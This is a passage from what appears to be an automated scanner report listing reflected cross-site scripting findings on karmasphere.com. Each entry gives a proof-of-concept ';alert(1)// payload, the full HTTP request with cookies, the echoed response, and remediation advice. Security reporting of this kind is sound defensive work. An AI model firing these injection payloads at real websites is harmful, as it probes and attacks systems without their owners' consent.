<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/In-The-News/474d7';alert(1)//5a22ddb751a&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return tru ...[SNIP]...
3.42. http://karmasphere.com/In-The-News/hadoop-basics-and-development-with-karmasphere.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10aab'%3balert(1)//f604f148574 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 10aab';alert(1)//f604f148574 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /In-The-News/hadoop-basics-and-development-with-karmasphere.html?10aab'%3balert(1)//f604f148574=1 HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 200 OK Date: Tue, 01 Feb 2011 03:01:48 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:01:48 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 30812
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <10aab';alert(1)//f604f148574=1&title=TechRepublic: Hadoop Basics and Development with Karmasphere&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1655c'%3balert(1)//0ea52dad714 was submitted in the REST URL parameter 1. This input was echoed as 1655c';alert(1)//0ea52dad714 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Miscellaneous1655c'%3balert(1)//0ea52dad714/management.html HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 03:02:43 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:02:44 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34756
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/Miscellaneous1655c';alert(1)//0ea52dad714/management.html&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wir ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6664b'%3balert(1)//06705144e9d was submitted in the REST URL parameter 2. This input was echoed as 6664b';alert(1)//06705144e9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Miscellaneous/6664b'%3balert(1)//06705144e9d HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 03:03:38 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:03:38 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34726
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/Miscellaneous/6664b';alert(1)//06705144e9d&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return tru ...[SNIP]...
3.45. http://karmasphere.com/Miscellaneous/management.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://karmasphere.com
Path:
/Miscellaneous/management.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71aba'%3balert(1)//5706c1c30c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 71aba';alert(1)//5706c1c30c3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Miscellaneous/management.html?71aba'%3balert(1)//5706c1c30c3=1 HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 200 OK Date: Tue, 01 Feb 2011 03:02:10 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:02:11 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33369
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <71aba';alert(1)//5706c1c30c3=1&title=Big Data Intelligence from Karmasphere | Management&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit d ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d183'%3balert(1)//c6211ba5095 was submitted in the REST URL parameter 2. This input was echoed as 2d183';alert(1)//c6211ba5095 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Miscellaneous/2d183'%3balert(1)//c6211ba5095 HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 03:01:59 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:02:00 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34726
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/Miscellaneous/2d183';alert(1)//c6211ba5095&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return tru ...[SNIP]...
3.47. http://karmasphere.com/Miscellaneous/overview.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://karmasphere.com
Path:
/Miscellaneous/overview.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd187'%3balert(1)//73f6d1c6f6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cd187';alert(1)//73f6d1c6f6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Miscellaneous/overview.html?cd187'%3balert(1)//73f6d1c6f6b=1 HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 200 OK Date: Tue, 01 Feb 2011 03:00:05 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:00:05 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29010
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <cd187';alert(1)//73f6d1c6f6b=1&title=Big Data Intelligence Software for Developers & Analysts | Karmasphere&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92c2c'%3balert(1)//3cbca78891b was submitted in the REST URL parameter 1. This input was echoed as 92c2c';alert(1)//3cbca78891b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Partners92c2c'%3balert(1)//3cbca78891b/partners-page.html HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 03:01:28 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:01:28 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34752
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/Partners92c2c';alert(1)//3cbca78891b/partners-page.html&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d284'%3balert(1)//24c673d15f6 was submitted in the REST URL parameter 2. This input was echoed as 9d284';alert(1)//24c673d15f6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Partners/9d284'%3balert(1)//24c673d15f6 HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 03:02:22 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:02:22 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/Partners/9d284';alert(1)//24c673d15f6&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return tru ...[SNIP]...
3.50. http://karmasphere.com/Partners/partners-page.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://karmasphere.com
Path:
/Partners/partners-page.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee372'%3balert(1)//2a8ec03238d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee372';alert(1)//2a8ec03238d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Partners/partners-page.html?ee372'%3balert(1)//2a8ec03238d=1 HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 200 OK Date: Tue, 01 Feb 2011 03:00:24 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:00:25 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27666
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <ee372';alert(1)//2a8ec03238d=1&title=Partners&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3977a'%3balert(1)//65b9326783f was submitted in the REST URL parameter 1. This input was echoed as 3977a';alert(1)//65b9326783f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Products-Information3977a'%3balert(1)//65b9326783f/karmasphere-analyst.html HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 02:57:57 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 02:57:58 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34788
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/Products-Information3977a';alert(1)//65b9326783f/karmasphere-analyst.html&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarb ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25464'%3balert(1)//eeb061c5382 was submitted in the REST URL parameter 2. This input was echoed as 25464';alert(1)//eeb061c5382 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Products-Information/25464'%3balert(1)//eeb061c5382 HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 02:59:22 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 02:59:23 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34740
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/Products-Information/25464';alert(1)//eeb061c5382&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return tru ...[SNIP]...
3.53. http://karmasphere.com/Products-Information/karmasphere-analyst.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://karmasphere.com
Path:
/Products-Information/karmasphere-analyst.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19636'%3balert(1)//83cc3c5973a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19636';alert(1)//83cc3c5973a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Products-Information/karmasphere-analyst.html?19636'%3balert(1)//83cc3c5973a=1 HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
